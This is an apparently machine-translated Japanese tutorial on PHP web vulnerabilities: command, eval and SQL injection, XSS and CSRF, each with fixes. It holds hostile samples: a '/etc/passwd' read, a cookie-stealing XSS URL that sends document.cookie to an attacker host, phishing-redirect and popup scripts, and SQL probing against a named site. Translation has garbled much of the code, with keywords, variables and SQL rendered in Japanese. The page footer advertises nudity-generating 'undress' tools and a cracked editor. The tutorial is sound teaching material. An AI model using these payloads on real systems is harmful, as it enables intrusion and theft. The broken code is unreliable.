検索
ホームページphp教程php手册PHPの脆弱性を徹底解説

コマンド注入攻撃
PHP では次の 5 つの関数を使用して外部アプリケーションまたは関数を実行できます
system、exec、passthru、shell_exec、"(shell_exec と同じ関数)
関数プロトタイプ
文字列システム(文字列コマンド, int &return_var)
command 実行するコマンド
return_var には、実行コマンド
の実行後のステータス値が格納されます。 string exec (string コマンド、配列 &output、int &return_var)
command 実行するコマンド
Output は、コマンド
を実行して文字列出力の各行を取得します。 return_var には、コマンド
の実行後のステータス値が格納されます。 void passthru (文字列コマンド、int &return_var)
command 実行するコマンド
return_var には、コマンド
の実行後のステータス値が格納されます。 文字列shell_exec (文字列コマンド)
command 実行するコマンド

脆弱性
例 1:
//ex1.php
$dir = $_GET["dir"];
if (isset($dir))
{
echo "

";<br>
system("ls -al ".$dir);<br>
echo "
";
}
?>
http://www.sectop.com/ex1.php?dir= cat /etc/passwd
を送信します 送信後、コマンドは system("ls -al cat /etc/passwd"); になります。

評価インジェクション攻撃
eval 関数は、入力文字列パラメーターを PHP プログラム コード
として実行します。 関数プロトタイプ:
mixed eval(string code_str) //eval インジェクションは通常、攻撃者が入力文字列
を制御できる場合に発生します。 //ex2.php
$var = "var";
if (isset($_GET["arg"]))
{
$arg = $_GET["arg"];
eval("$var = $arg;");
echo "$var =".$var;
}
?>
http://www.sectop.com/ex2.php?arg=phpinfo(); を送信すると、脆弱性が発生します

動的関数
関数 A()
{
何かをする();
}
関数 B()
{
何かをする();
}
if (isset($_GET["func"]))
{
$myfunc = $_GET["func"];
echo $myfunc();
}
?>
プログラマの本来の意図は、関数 A と B を動的に呼び出すことであり、その後、http://www.sectop.com/ex.php?func=phpinfo を送信すると、脆弱性が生成されます

予防方法
1. 外部コマンドを実行しないようにしてください
2. カスタム関数または関数ライブラリを使用して外部コマンドの関数を置き換えます
3.escapeshellarg関数を使用してコマンドパラメータを処理します
4.safe_mode_exec_dir を使用して、実行可能ファイル
のパスを指定します。 esacpeshellarg 関数は、パラメータまたはコマンドの終了を引き起こす文字をすべてエスケープします。一重引用符「'」は「'」に、二重引用符「"」は「;」に置き換えられます。 「
」 実行可能ファイルのパスを指定するには、safe_mode_exec_dir を使用します。使用するコマンドを事前にこのパスに配置できます。
セーフモード = オン
safe_mode_exec_di r= /usr/local/php/bin/

クライアント側スクリプトの埋め込み

クライアント側スクリプトの挿入 (スクリプト挿入) とは、フォーム、画像、アニメーション、ハイパーリンク テキストなどのオブジェクトに実行可能スクリプトを挿入することを指します。ユーザーがこれらのオブジェクトを開くと、攻撃者によって埋め込まれたスクリプトが実行され、攻撃が始まります。
スクリプトの埋め込みに使用できる HTML タグには通常、次のものが含まれます:
1. <script> タグでマークされた JavaScript や vbscript などのページ スクリプト プログラム。 <script> タグで js プログラム コードを指定することも、src 属性 <br/> で js ファイルの URL パスを指定することもできます。 2. <object> タグでマークされたオブジェクト。これらのオブジェクトは、Java アプレット、マルチメディア ファイル、ActiveX コントロールなどです。通常、オブジェクトの URL パスはデータ属性 <br/> 内で指定されます。 3. <embed> タグでマークされたオブジェクト。これらのオブジェクトは、swf ファイルなどのマルチメディア ファイルです。オブジェクトの URL パスは通常、src 属性 <br/> 内で指定されます。 4. <applet> ラベルでマークされたオブジェクト。これらのオブジェクトは Java アプレットであり、オブジェクトへの URL パスは通常、コードベース属性 <br/> 内で指定されます。 5. <form> タグでマークされたオブジェクト。フォーム <span class="t_tag" href="tag.php?name=%CA%FD%BE%DD"> データ を処理する Web アプリケーションの URL パスは、通常、アクション属性 </script>

内で指定されます。

クライアント側スクリプト埋め込み攻撃手順
1. 攻撃者は一般ユーザーとして登録し、Web サイト
にログインします。 2.メッセージページを開き、攻撃用のJSコードを挿入します
3. 他のユーザー (管理者を含む) が Web サイトにログインし、このメッセージの内容を閲覧します
4. メッセージ内容に隠されていたjsコードが実行され、攻撃が成功しました


データベース
CREATE TABLE `postmessage` (
`id` int(11) NOT NULL auto_increment,
`subject` varchar(60) NOT NULL デフォルト ”,
`name` varchar(40) NOT NULL デフォルト ”,
`email` varchar(25) NOT NULL デフォルト ”,
「質問」メディアテキストが NULL ではありません、
`postdate` datetime NOT NULL デフォルト '0000-00-00 00:00:00',
主キー (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=’ユーザーのメッセージ’ AUTO_INCREMENT=69;
//add.php メッセージを挿入
//list.php メッセージリスト
//show.php メッセージを表示

下の画像を添えてメッセージを送信してください

このメッセージを閲覧すると、js スクリプトが実行されます
<script>while(1){windows.open();}</script> 無限ポップアップ ボックスを挿入します
Insert<script>location.href="http://www.sectop.com";</script> フィッシング ページにジャンプします
または、他の自己構築された JS コードを使用して攻撃します

予防方法
通常、特殊文字を HTML エンコーディングに変換するには、htmlspecialchars 関数を使用します
関数プロトタイプ
string htmlspecialchars (string string、int quote_style、string charset)
string はエンコードされる文字列です
quote_style はオプションです。値は ENT_COMPAT、ENT_QUOTES、または ENT_NOQUOTES です。これは、二重引用符のみが変換され、一重引用符は変換されないことを意味します。 ENT_QUOTES。二重引用符と一重引用符の両方を変換する必要があることを示します。 ENT_NOQUOTES、二重引用符と一重引用符が変換されないことを示します
charset オプション。使用される文字セットを示します
この関数は、次の特殊文字を HTML エンコードに変換します:
& —-> &
" —-> "
「—->」

> -> >
show.php の 98 行目を
に変更します。
次に、js が挿入されている 脆弱性 ページ
を確認します。

XSS クロスサイト スクリプティング攻撃

XSS(Cross Site Scripting)とは、クロスサイトスクリプティング攻撃のことを指し、CSS(Cascading Style Sheet)と区別するため、XSS
と略します。 クロスサイト スクリプティングは、攻撃者が Web サイト ユーザーの Cookie やその他の個人データを読み取るために主に使用され、このデータを取得すると、そのユーザーになりすまして Web サイトにログインし、このユーザーの許可を取得することができます。
クロスサイト スクリプティング攻撃の一般的な手順:
1. 攻撃者は、何らかの方法で xss http リンクをターゲット ユーザーに送信します
2. ターゲットユーザーはこの Web サイトにログインし、ログインプロセス中に攻撃者によって送信された xss リンクを開きました
3. Web サイトはこの xss 攻撃スクリプトを実行しました
4. 対象ユーザーのページから攻撃者のWebサイトにジャンプし、攻撃者は対象ユーザーの情報を取得します
5. 攻撃者はターゲットユーザーの情報を使用して Web サイトにログインし、攻撃を完了します

クロスサイト脆弱性を持つプログラムが出現すると、攻撃者は http://www.sectop.com/search.php?key=<script>document.location= ' のようなものを構築する可能性があります。 http://www.hack.com/getcookie.php?cookie='+document.cookie;</script>>、ユーザーを騙してクリックさせた後、ユーザーの Cookie 値を取得できます
予防方法:
htmlspecialchars 関数を使用して特殊文字を HTML エンコーディングに変換します
関数プロトタイプ
string htmlspecialchars (string string、int quote_style、string charset)
String はエンコードされる文字列です
quote_style はオプションです。値は ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES です。デフォルト値は ENT_COMPAT です。これは、二重引用符のみが変換され、一重引用符は変換されないことを意味します。 ENT_QUOTES。二重引用符と一重引用符の両方を変換する必要があることを示します。 ENT_NOQUOTES、二重引用符も一重引用符も変換されないことを示します
charset はオプションで、使用される文字セットを示します
この関数は、次の特殊文字を HTML エンコードに変換します:
& —-> &
" —-> "
「—->」

> -> >

$_SERVER["PHP_SELF"] 変数のクロスサイト
フォームでパラメーターを自分自身に送信する場合は、次のようなステートメントを使用します
"メソッド="POST">
……

$_SERVER["PHP_SELF"] 変数の値は現在のページ名です
例:
http://www.sectop.com/get.php
get.php
の上記フォーム 次に
を送信します http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>>
すると、フォームは
になります。

<script>alert(document.cookie);</script>" method="POST">
クロスサイト スクリプティングが挿入されました
防御方法は、htmlspecialchars を使用して出力変数をフィルター処理するか、
を使用してフォームを独自のファイルに送信することです。
これにより、$_SERVER["PHP_SELF"] 変数がクロスサイトになることを直接回避できます

SQL インジェクション攻撃

SQL インジェクション攻撃 (SQL インジェクション) は、攻撃者が慎重に作成した SQL ステートメントをフォームに送信し、Web プログラムが送信されたデータをチェックしない場合、SQL インジェクション攻撃を引き起こします。

SQL インジェクション攻撃の一般的な手順:

1. 攻撃者は SQL インジェクションの脆弱性のあるサイトにアクセスし、インジェクション ポイントを探します

2. 攻撃者は注入ステートメントを構築し、その注入ステートメントがプログラム内の SQL ステートメントと結合されて新しい SQL ステートメント

が生成されます。

3. 新しい SQL ステートメントが処理のためにデータベースに送信されます

4. データベースが新しい SQL ステートメントを実行し、SQL インジェクション攻撃をトリガーしました

データベース

CREATE TABLE `postmessage` (

`id` int(11) NOT NULL auto_increment,

`subject` varchar(60) NOT NULL デフォルト ”,

`name` varchar(40) NOT NULL デフォルト ”,

`email` varchar(25) NOT NULL デフォルト ”,

`質問` メディアテキスト NOT NULL,

`postdate` datetime NOT NULL デフォルト '0000-00-00 00:00:00',

主キー (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=’ユーザーのメッセージ’ AUTO_INCREMENT=69;

ch3.* のすべての権限を、'123456'; で識別される sectop’@localhost

に付与します。

//add.php メッセージを挿入

//list.php メッセージリスト

//show.php メッセージを表示

ページ http://www.netsos.com.cn/show.php?id=71 注入ポイントがある可能性があります。テストしてみましょう

http://www.netsos.com.cn/show.php?id=71 および 1=1

ページに戻る

送信

レコードがクエリされたら、レコードがなくなったら、ソース コードを見てみましょう

//show.php 12~15行目

//mysqlクエリステートメントを実行

$query = "select * from postmessage where id = ".$_GET["id"];

$result = mysql_query($query)

または die("ySQL クエリ ステートメントの実行に失敗しました: " .mysql_error());

パラメーター ID が渡された後、前の文字列と結合された SQL ステートメントがデータベースに入れられ、クエリ

が実行されます。

Submit と 1=1 の場合、ステートメントは select * from postmessage where id = 71 および 1=1 となり、このステートメントの前後の値は両方とも true、および の後の値も true になり、クエリされたデータが返されます

Submit および 1=2 の場合、ステートメントは select * from postmessage (id = 71 および 1=2) になり、このステートメントの最初の値は true、最後の値は false、次の値は false になり、データはクエリできません。

通常の SQL クエリは、構築したステートメントを通過した後、SQL インジェクション攻撃を形成します。このインジェクションポイントを通じて、union を使用して管理パスワードを読み取る、データベース情報を読み取る、または mysql のload_file を使用するなどの権限を outfile やその他の関数にさらに取得して、さらに侵入することができます。

予防方法

整数パラメータ:

intval 関数を使用してデータを整数に変換します

関数プロトタイプ

int intval(mixed var, int Base)

Var は整数に変換される変数です

Base (オプション) は基本番号で、デフォルトは 10

浮動小数点パラメータ:

floatval 関数または doubleval 関数を使用して、それぞれ単精度および倍精度浮動小数点パラメータを変換します

関数プロトタイプ

int floatval(混合変数)

Var は変換される変数です

int doubleval(mixed var)

Var は変換される変数です

キャラクターパラメータ:

addslashes 関数を使用して、一重引用符 "'" を "'"、二重引用符 """ から """、バックスラッシュ "" から "\"、および NULL 文字とバックスラッシュ ""

を変換します。

関数プロトタイプ

文字列はスラッシュを追加します (文字列 str)

Str はチェックする文字列です

したがって、先ほど現れたコードの脆弱性は、次のように修正できます

//mysqlクエリステートメントを実行

$query = "select * from postmessage where id = ".intval($_GET["id"]);

$result = mysql_query($query)

または die("ySQL クエリ ステートメントの実行に失敗しました: " .mysql_error());

文字タイプの場合は、最初に magic_quotes_gpc を On にできるかどうかを判断します。 On にできない場合は、addslashes を使用して特殊文字

をエスケープします。

if(get_magic_quotes_gpc())

{

$var = $_GET["var"];

}

それ以外

{

$var = addlashes($_GET["var"]);

}

再度テストしたところ、脆弱性は修正されました

壊れた Web サイトの偽のリクエスト

CSRF(Cross Site Request Forgeries)はクロスサイトリクエストフォージェリを意味し、XSRFとも書きます。 攻撃者は、ターゲット ユーザーの HTTP リクエストを偽造し、CSRF脆弱性を持つ Web サイトにこのリクエストを送信し、Web サイトがこのリクエストを実行すると、クロスサイト リクエスト フォージェリ攻撃が引き起こされます。 。攻撃者は秘密の HTTP 接続を使用して、ターゲット ユーザーが気づかずにこのリンクをクリックできるようにします。ユーザーは自分でクリックしたものであり、合法的な 権限 を持つ正当なユーザーであるため、ターゲット ユーザーは特定の HTTP を実行できます。攻撃者の目的を達成するために、Web サイト内のリンクを攻撃します。
例: ショッピング Web サイトで商品を購入する場合、http://www.shop.com/buy.php?item=watch&num=1 を使用して、購入する商品とその数値を決定します。パラメータは、攻撃者がターゲット ユーザーに秘密の方法でリンクを送信した場合に何を購入するかを決定します
PHPの脆弱性を徹底解説 の場合、対象ユーザーが誤ってアクセスすると購入数量が 1000 個となります


隋源ネットワークPHP 掲示板 V1.0

メッセージを自由に削除
//delbook.php このページはメッセージを削除するために使用されます
include_once("dlyz.php"); //dlyz.php のユーザー確認権限、権限が管理者の場合のみメッセージを削除できます
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="データ")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="ID が (".$ID_Dele.") にある書籍から削除";
mysql_query($sql);
}
それ以外
{
$sql="delete from book where id=".$id //削除するメッセージ ID を渡します
mysql_query($sql);
}
mysql_close($conn);
echo "";
?>
管理者権限があり http://localhost/manage/delbook.php?id=2 を送信すると、ID 2 のメッセージが削除されます
使用方法:
私たちは一般ユーザーを使用してメッセージを残します (ソースコード方式)。内容は
です。 PHPの脆弱性を徹底解説

PHPの脆弱性を徹底解説

PHPの脆弱性を徹底解説

PHPの脆弱性を徹底解説
4 つの画像リンクを挿入し、4 つの ID メッセージを削除します。その後、ホームページに戻って参照し、変更がないことを確認します。 。画像が表示できません
ここで、管理者アカウントでログインしてホームページを更新すると、メッセージが 1 つだけ残っており、画像リンクで指定された ID 番号を持つ他のメッセージはすべて削除されていることがわかります。
攻撃者はメッセージに隠し画像リンクを挿入しますが、攻撃者自身がこれらの画像リンクにアクセスすると、その効果は見えません。 , このメッセージを表示すると隠しリンクが実行され、彼の権限は十分に大きいため、これらのメッセージは削除されます
管理者パスワードを変更
//pass.php
if($_GET["act"])
{
$ユーザー名=$_POST["ユーザー名"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["タイトル"];
$copyright=$_POST["copyright"]."
設計と製造:厦門水源ネットワーク技術";
$password=md5($_POST["パスワード"]);
if(empty($_POST["パスワード"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright ='".$copyright."'、id=1";
}
それ以外
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title ='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "";
}
このファイルは、管理パスワードと Web サイト設定に関する一部の情報を変更するために使用され、次のフォームを直接構築できます:







声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
解决方法:您的组织要求您更改 PIN 码解决方法:您的组织要求您更改 PIN 码Oct 04, 2023 pm 05:45 PM

“你的组织要求你更改PIN消息”将显示在登录屏幕上。当在使用基于组织的帐户设置的电脑上达到PIN过期限制时,就会发生这种情况,在该电脑上,他们可以控制个人设备。但是,如果您使用个人帐户设置了Windows,则理想情况下不应显示错误消息。虽然情况并非总是如此。大多数遇到错误的用户使用个人帐户报告。为什么我的组织要求我在Windows11上更改我的PIN?可能是您的帐户与组织相关联,您的主要方法应该是验证这一点。联系域管理员会有所帮助!此外,配置错误的本地策略设置或不正确的注册表项也可能导致错误。即

Windows 11 上调整窗口边框设置的方法:更改颜色和大小Windows 11 上调整窗口边框设置的方法:更改颜色和大小Sep 22, 2023 am 11:37 AM

Windows11将清新优雅的设计带到了最前沿;现代界面允许您个性化和更改最精细的细节,例如窗口边框。在本指南中,我们将讨论分步说明,以帮助您在Windows操作系统中创建反映您的风格的环境。如何更改窗口边框设置?按+打开“设置”应用。WindowsI转到个性化,然后单击颜色设置。颜色更改窗口边框设置窗口11“宽度=”643“高度=”500“&gt;找到在标题栏和窗口边框上显示强调色选项,然后切换它旁边的开关。若要在“开始”菜单和任务栏上显示主题色,请打开“在开始”菜单和任务栏上显示主题

如何在 Windows 11 上更改标题栏颜色?如何在 Windows 11 上更改标题栏颜色?Sep 14, 2023 pm 03:33 PM

默认情况下,Windows11上的标题栏颜色取决于您选择的深色/浅色主题。但是,您可以将其更改为所需的任何颜色。在本指南中,我们将讨论三种方法的分步说明,以更改它并个性化您的桌面体验,使其具有视觉吸引力。是否可以更改活动和非活动窗口的标题栏颜色?是的,您可以使用“设置”应用更改活动窗口的标题栏颜色,也可以使用注册表编辑器更改非活动窗口的标题栏颜色。若要了解这些步骤,请转到下一部分。如何在Windows11中更改标题栏的颜色?1.使用“设置”应用按+打开设置窗口。WindowsI前往“个性化”,然

OOBELANGUAGE错误Windows 11 / 10修复中出现问题的问题OOBELANGUAGE错误Windows 11 / 10修复中出现问题的问题Jul 16, 2023 pm 03:29 PM

您是否在Windows安装程序页面上看到“出现问题”以及“OOBELANGUAGE”语句?Windows的安装有时会因此类错误而停止。OOBE表示开箱即用的体验。正如错误提示所表示的那样,这是与OOBE语言选择相关的问题。没有什么可担心的,你可以通过OOBE屏幕本身的漂亮注册表编辑来解决这个问题。快速修复–1.单击OOBE应用底部的“重试”按钮。这将继续进行该过程,而不会再打嗝。2.使用电源按钮强制关闭系统。系统重新启动后,OOBE应继续。3.断开系统与互联网的连接。在脱机模式下完成OOBE的所

Windows 11 上启用或禁用任务栏缩略图预览的方法Windows 11 上启用或禁用任务栏缩略图预览的方法Sep 15, 2023 pm 03:57 PM

任务栏缩略图可能很有趣,但它们也可能分散注意力或烦人。考虑到您将鼠标悬停在该区域的频率,您可能无意中关闭了重要窗口几次。另一个缺点是它使用更多的系统资源,因此,如果您一直在寻找一种提高资源效率的方法,我们将向您展示如何禁用它。不过,如果您的硬件规格可以处理它并且您喜欢预览版,则可以启用它。如何在Windows11中启用任务栏缩略图预览?1.使用“设置”应用点击键并单击设置。Windows单击系统,然后选择关于。点击高级系统设置。导航到“高级”选项卡,然后选择“性能”下的“设置”。在“视觉效果”选

Windows 11 上的显示缩放比例调整指南Windows 11 上的显示缩放比例调整指南Sep 19, 2023 pm 06:45 PM

在Windows11上的显示缩放方面,我们都有不同的偏好。有些人喜欢大图标,有些人喜欢小图标。但是,我们都同意拥有正确的缩放比例很重要。字体缩放不良或图像过度缩放可能是工作时真正的生产力杀手,因此您需要知道如何对其进行自定义以充分利用系统功能。自定义缩放的优点:对于难以阅读屏幕上的文本的人来说,这是一个有用的功能。它可以帮助您一次在屏幕上查看更多内容。您可以创建仅适用于某些监视器和应用程序的自定义扩展配置文件。可以帮助提高低端硬件的性能。它使您可以更好地控制屏幕上的内容。如何在Windows11

10种在 Windows 11 上调整亮度的方法10种在 Windows 11 上调整亮度的方法Dec 18, 2023 pm 02:21 PM

屏幕亮度是使用现代计算设备不可或缺的一部分,尤其是当您长时间注视屏幕时。它可以帮助您减轻眼睛疲劳,提高易读性,并轻松有效地查看内容。但是,根据您的设置,有时很难管理亮度,尤其是在具有新UI更改的Windows11上。如果您在调整亮度时遇到问题,以下是在Windows11上管理亮度的所有方法。如何在Windows11上更改亮度[10种方式解释]单显示器用户可以使用以下方法在Windows11上调整亮度。这包括使用单个显示器的台式机系统以及笔记本电脑。让我们开始吧。方法1:使用操作中心操作中心是访问

如何在Safari中关闭iPhone的隐私浏览身份验证?如何在Safari中关闭iPhone的隐私浏览身份验证?Nov 29, 2023 pm 11:21 PM

在iOS17中,Apple为其移动操作系统引入了几项新的隐私和安全功能,其中之一是能够要求对Safari中的隐私浏览选项卡进行二次身份验证。以下是它的工作原理以及如何将其关闭。在运行iOS17或iPadOS17的iPhone或iPad上,如果您在Safari浏览器中打开了任何“无痕浏览”标签页,然后退出会话或App,Apple的浏览器现在需要面容ID/触控ID认证或密码才能再次访问它们。换句话说,如果有人在解锁您的iPhone或iPad时拿到了它,他们仍然无法在不知道您的密码的情况下查看您的隐私

See all articles

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SecLists

SecLists

SecLists は、セキュリティ テスターの究極の相棒です。これは、セキュリティ評価中に頻繁に使用されるさまざまな種類のリストを 1 か所にまとめたものです。 SecLists は、セキュリティ テスターが必要とする可能性のあるすべてのリストを便利に提供することで、セキュリティ テストをより効率的かつ生産的にするのに役立ちます。リストの種類には、ユーザー名、パスワード、URL、ファジング ペイロード、機密データ パターン、Web シェルなどが含まれます。テスターはこのリポジトリを新しいテスト マシンにプルするだけで、必要なあらゆる種類のリストにアクセスできるようになります。

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。

EditPlus 中国語クラック版

EditPlus 中国語クラック版

サイズが小さく、構文の強調表示、コード プロンプト機能はサポートされていません

mPDF

mPDF

mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。